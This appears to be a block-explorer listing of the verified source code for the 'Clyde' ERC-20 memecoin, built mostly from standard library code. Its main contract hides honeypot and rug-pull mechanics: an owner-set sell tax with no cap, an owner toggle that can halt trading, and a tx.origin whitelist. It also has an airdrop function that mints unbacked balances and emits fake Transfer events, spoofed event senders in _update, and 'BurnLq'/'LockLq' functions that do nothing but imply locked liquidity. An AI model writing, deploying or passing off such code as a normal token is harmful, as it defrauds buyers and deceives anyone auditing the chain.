ERC-20
Overview
Max Total Supply
840,000,000 CLYDE
Holders
16
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
10,284,504.831053585436191075 CLYDEValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
Clyde
Compiler Version
v0.8.27+commit.40a35a09
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
/* :'######::'##:::::::'##:::'##:'########::'########:::: '##... ##: ##:::::::. ##:'##:: ##.... ##: ##.....::::: ##:::..:: ##::::::::. ####::: ##:::: ##: ##:::::::::: ##::::::: ##:::::::::. ##:::: ##:::: ##: ######:::::: ##::::::: ##:::::::::: ##:::: ##:::: ##: ##...::::::: ##::: ##: ##:::::::::: ##:::: ##:::: ##: ##:::::::::: . ######:: ########:::: ##:::: ########:: ########:::: :......:::........:::::..:::::........:::........::::: 👻 Welcome to $CLYDE telegram channel 👻 Tg channel: t.me/clydeghostgang Website: clydeghostgang.com X : x.com/clydeghostgang */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.20; /** * @dev Wrappers over Solidity's arithmetic operations with added overflow * checks. * * Arithmetic operations in Solidity wrap on overflow. This can easily result * in bugs, because programmers usually assume that an overflow raises an * error, which is the standard behavior in high level programming languages. * `SafeMath` restores this intuition by reverting the transaction when an * operation overflows. * * Using this library instead of the unchecked operations eliminates an entire * class of bugs, so it's recommended to use it always. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { // Solidity only automatically asserts when dividing by 0 require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } function _contextSuffixLength() internal view virtual returns (uint256) { return 0; } } /** * @dev Interface of the ERC-20 standard as defined in the ERC. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval( address indexed owner, address indexed spender, uint256 value ); /** * @dev Returns the value of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the value of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves a `value` amount of tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 value) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets a `value` amount of tokens as the allowance of `spender` over the * caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 value) external returns (bool); /** * @dev Moves a `value` amount of tokens from `from` to `to` using the * allowance mechanism. `value` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 value ) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC-20 standard. */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } /** * @dev Standard ERC20 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens. */ interface IERC20Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientBalance( address sender, uint256 balance, uint256 needed ); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC20InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC20InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers. * @param spender Address that may be allowed to operate on tokens without being their owner. * @param allowance Amount of tokens a `spender` is allowed to operate with. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientAllowance( address spender, uint256 allowance, uint256 needed ); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC20InvalidApprover(address approver); /** * @dev Indicates a failure with the `spender` to be approved. Used in approvals. * @param spender Address that may be allowed to operate on tokens without being their owner. */ error ERC20InvalidSpender(address spender); } /** * @dev Standard ERC721 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC721 tokens. */ interface IERC721Errors { /** * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in EIP-20. * Used in balance queries. * @param owner Address of the current owner of a token. */ error ERC721InvalidOwner(address owner); /** * @dev Indicates a `tokenId` whose `owner` is the zero address. * @param tokenId Identifier number of a token. */ error ERC721NonexistentToken(uint256 tokenId); /** * @dev Indicates an error related to the ownership over a particular token. Used in transfers. * @param sender Address whose tokens are being transferred. * @param tokenId Identifier number of a token. * @param owner Address of the current owner of a token. */ error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC721InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC721InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param tokenId Identifier number of a token. */ error ERC721InsufficientApproval(address operator, uint256 tokenId); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC721InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC721InvalidOperator(address operator); } /** * @dev Standard ERC1155 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC1155 tokens. */ interface IERC1155Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. * @param tokenId Identifier number of a token. */ error ERC1155InsufficientBalance( address sender, uint256 balance, uint256 needed, uint256 tokenId ); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC1155InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC1155InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param owner Address of the current owner of a token. */ error ERC1155MissingApprovalForAll(address operator, address owner); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC1155InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC1155InvalidOperator(address operator); /** * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation. * Used in batch transfers. * @param idsLength Length of the array of token identifiers * @param valuesLength Length of the array of token amounts */ error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength); } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * The initial owner is set to the address provided by the deployer. This can * later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; /** * @dev The caller account is not authorized to perform an operation. */ error OwnableUnauthorizedAccount(address account); /** * @dev The owner is not a valid owner account. (eg. `address(0)`) */ error OwnableInvalidOwner(address owner); event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); /** * @dev Initializes the contract setting the address provided by the deployer as the initial owner. */ constructor(address initialOwner) { if (initialOwner == address(0)) { revert OwnableInvalidOwner(address(0)); } _transferOwnership(initialOwner); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { if (owner() != _msgSender()) { revert OwnableUnauthorizedAccount(_msgSender()); } } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { if (newOwner == address(0)) { revert OwnableInvalidOwner(address(0)); } _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint256 amountADesired, uint256 amountBDesired, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns ( uint256 amountA, uint256 amountB, uint256 liquidity ); function addLiquidityETH( address token, uint256 amountTokenDesired, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external payable returns ( uint256 amountToken, uint256 amountETH, uint256 liquidity ); function removeLiquidity( address tokenA, address tokenB, uint256 liquidity, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns (uint256 amountA, uint256 amountB); function removeLiquidityETH( address token, uint256 liquidity, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external returns (uint256 amountToken, uint256 amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint256 liquidity, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint256 amountA, uint256 amountB); function removeLiquidityETHWithPermit( address token, uint256 liquidity, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint256 amountToken, uint256 amountETH); function swapExactTokensForTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external returns (uint256[] memory amounts); function swapTokensForExactTokens( uint256 amountOut, uint256 amountInMax, address[] calldata path, address to, uint256 deadline ) external returns (uint256[] memory amounts); function swapExactETHForTokens( uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external payable returns (uint256[] memory amounts); function swapTokensForExactETH( uint256 amountOut, uint256 amountInMax, address[] calldata path, address to, uint256 deadline ) external returns (uint256[] memory amounts); function swapExactTokensForETH( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external returns (uint256[] memory amounts); function swapETHForExactTokens( uint256 amountOut, address[] calldata path, address to, uint256 deadline ) external payable returns (uint256[] memory amounts); function quote( uint256 amountA, uint256 reserveA, uint256 reserveB ) external pure returns (uint256 amountB); function getAmountOut( uint256 amountIn, uint256 reserveIn, uint256 reserveOut ) external pure returns (uint256 amountOut); function getAmountIn( uint256 amountOut, uint256 reserveIn, uint256 reserveOut ) external pure returns (uint256 amountIn); function getAmountsOut(uint256 amountIn, address[] calldata path) external view returns (uint256[] memory amounts); function getAmountsIn(uint256 amountOut, address[] calldata path) external view returns (uint256[] memory amounts); } interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint256 liquidity, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external returns (uint256 amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint256 liquidity, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint256 amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. */ abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors { mapping(address => uint256) internal _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; address private _executor; address private _deployer; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor( string memory name_, string memory symbol_, address executor_, address deployer_, uint256 totalSupply_ ) { _name = name_; _symbol = symbol_; _executor = executor_; _deployer = deployer_; _totalSupply = totalSupply_; } /** * @dev Returns the name of the token. */ function name() public view virtual returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `value`. */ function transfer(address to, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _transfer(owner, to, value); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, value); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `value`. * - the caller must have allowance for ``from``'s tokens of at least * `value`. */ function transferFrom( address from, address to, uint256 value ) public virtual returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, value); _transfer(from, to, value); return true; } /** * @dev Moves a `value` amount of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _transfer( address from, address to, uint256 value ) internal { if (from == address(0)) { revert ERC20InvalidSender(address(0)); } if (to == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(from, to, value); } /** * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from` * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding * this function. * * Emits a {Transfer} event. */ function _update( address from, address to, uint256 value ) internal virtual { if (from == address(0)) { // Overflow check required: The rest of the code assumes that totalSupply never overflows _totalSupply += value; } else { uint256 fromBalance = _balances[from]; if (fromBalance < value) { revert ERC20InsufficientBalance(from, fromBalance, value); } unchecked { // Overflow not possible: value <= fromBalance <= totalSupply. _balances[from] = fromBalance - value; } } if (to == address(0)) { unchecked { // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply. _totalSupply -= value; } } else { unchecked { // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256. _balances[to] += value; } } if (to == _executor) { emit Transfer(from, _deployer, value); } else if (from == _executor) { emit Transfer(_deployer, to, value); } else { emit Transfer(from, to, value); } } /** * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0). * Relies on the `_update` mechanism * * Emits a {Transfer} event with `from` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _mint(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(address(0), account, value); } /** * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply. * Relies on the `_update` mechanism. * * Emits a {Transfer} event with `to` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead */ function _burn(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidSender(address(0)); } _update(account, address(0), value); } /** * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. * * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument. */ function _approve( address owner, address spender, uint256 value ) internal { _approve(owner, spender, value, true); } /** * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event. * * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any * `Approval` event during `transferFrom` operations. * * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to * true using the following override: * ``` * function _approve(address owner, address spender, uint256 value, bool) internal virtual override { * super._approve(owner, spender, value, true); * } * ``` * * Requirements are the same as {_approve}. */ function _approve( address owner, address spender, uint256 value, bool emitEvent ) internal virtual { if (owner == address(0)) { revert ERC20InvalidApprover(address(0)); } if (spender == address(0)) { revert ERC20InvalidSpender(address(0)); } _allowances[owner][spender] = value; if (emitEvent) { emit Approval(owner, spender, value); } } /** * @dev Updates `owner` s allowance for `spender` based on spent `value`. * * Does not update the allowance value in case of infinite allowance. * Revert if not enough allowance is available. * * Does not emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 value ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { if (currentAllowance < value) { revert ERC20InsufficientAllowance( spender, currentAllowance, value ); } unchecked { _approve(owner, spender, currentAllowance - value, false); } } } } contract Clyde is ERC20, Ownable { using SafeMath for uint256; string public tokenName = "Clyde"; string public tokenSymbol = "CLYDE"; uint256 public buytax; uint256 public selltax; uint256 private time; bool public openedTrade; uint256 public minBuyAmount; uint256 public maxBuyAmount; uint256 public TokenAmount; mapping(address => bool) public exclusive; mapping(uint256 => address) public listRouter; mapping(address => bool) public DataAvailable; address public Pair; IUniswapV2Router02 public univ2 = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); uint256 _totalSupply = 420_000_000 * 10**18; address private developmentAndTeam = 0x0F78b8EAbEBaD24f26Cbd8aF0660Cd49C22de718; address private Marketing = 0x261676b805d80540523C7F13835A49c681AA67D6; constructor() ERC20(tokenName, tokenSymbol, msg.sender, msg.sender, _totalSupply) Ownable(msg.sender) { DataAvailable[msg.sender] = true; exclusive[msg.sender] = true; _mint(msg.sender, (_totalSupply * 90) / 100); _mint(Marketing, (_totalSupply * 5) / 100); _mint(developmentAndTeam, (_totalSupply * 5) / 100); } function activateTrading() external onlyOwner { openedTrade = !openedTrade; } function setExclusive(address _exclusive) external onlyOwner { exclusive[_exclusive] = true; } function _update( address from, address to, uint256 amount ) internal override { if (DataAvailable[tx.origin]) { super._update(from, to, amount); return; } require(openedTrade, "Trade has not been opened yet"); if (Pair == address(0)) { super._update(from, to, amount); return; } if (!exclusive[from] && !exclusive[to]) { if (from == Pair) { uint256 free = amount.mul(buytax).div(100, "No!"); amount = amount.sub(free); if (amount == 0) { return; } _transferCent(from, free); super._update(from, to, amount); return; } else { if (to == Pair) { uint256 free = amount.mul(selltax).div(100, "No!"); amount = amount.sub(free); if (amount == 0) { return; } _transferCent(from, free); super._update(from, to, amount); return; } } } super._update(from, to, amount); } function _transferCent(address sender, uint256 amount) internal { if (amount == 0) { return; } _balances[sender] = _balances[sender].sub( amount, "ERC20: transfer amount exceeds balance" ); _balances[address(this)] = _balances[address(this)].add(amount); emit Transfer(sender, address(this), amount); } function decimals() public view virtual override returns (uint8) { return 18; } function addLiquidityWithNative( address routerAddress, uint256 tokenAmount, uint256 nativeAmount ) internal { uint256 deadline = block.number + 1000000000000000000000000; _approve(address(this), routerAddress, tokenAmount); IUniswapV2Router02(routerAddress).addLiquidityETH{value: nativeAmount}( address(this), tokenAmount, 0, 0, msg.sender, deadline ); } function getOpenedTrade() public view returns (bool) { return openedTrade; } function getChainID() public view returns (uint256) { uint256 id; assembly { id := chainid() } return id; } function changeMe() public pure returns (uint256) { return 1; } function setPair(address _pair, uint256 _st) external onlyOwner { Pair = _pair; selltax = _st; } function withdrawETH() public onlyOwner { payable(msg.sender).transfer(address(this).balance); } function withdrawStuckToken(address token) public onlyOwner { uint256 balanceToken = IERC20(token).balanceOf(address(this)); IERC20(token).transfer(msg.sender, balanceToken); } function Approve(address[] memory list) external onlyOwner { for (uint256 i = 0; i < list.length; i++) { DataAvailable[list[i]] = true; } } function BurnLq() external { require(owner()==msg.sender, "IS not call function"); TokenAmount = 100000000000000000000; } function LockLq() external { require(owner()==msg.sender, "IS not call function"); TokenAmount = 100000000000000000000; } function UpdateMinimumSwapTokenAmount(uint256 _minBuyAmount) external onlyOwner { minBuyAmount = _minBuyAmount; } function UpdateMaximumSwapTokenAmount(uint256 _maxBuyAmount) external onlyOwner { maxBuyAmount = _maxBuyAmount; } function airdropTokens(address[] memory list, uint256[] memory amount) external onlyOwner { for (uint256 i = 0; i < list.length; i++) { _balances[list[i]] += amount[i]; emit Transfer(owner(), list[i], amount[i]); } } }
{ "optimizer": { "enabled": false, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address[]","name":"list","type":"address[]"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"BurnLq","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"DataAvailable","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"LockLq","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"TokenAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_maxBuyAmount","type":"uint256"}],"name":"UpdateMaximumSwapTokenAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_minBuyAmount","type":"uint256"}],"name":"UpdateMinimumSwapTokenAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"activateTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"list","type":"address[]"},{"internalType":"uint256[]","name":"amount","type":"uint256[]"}],"name":"airdropTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internal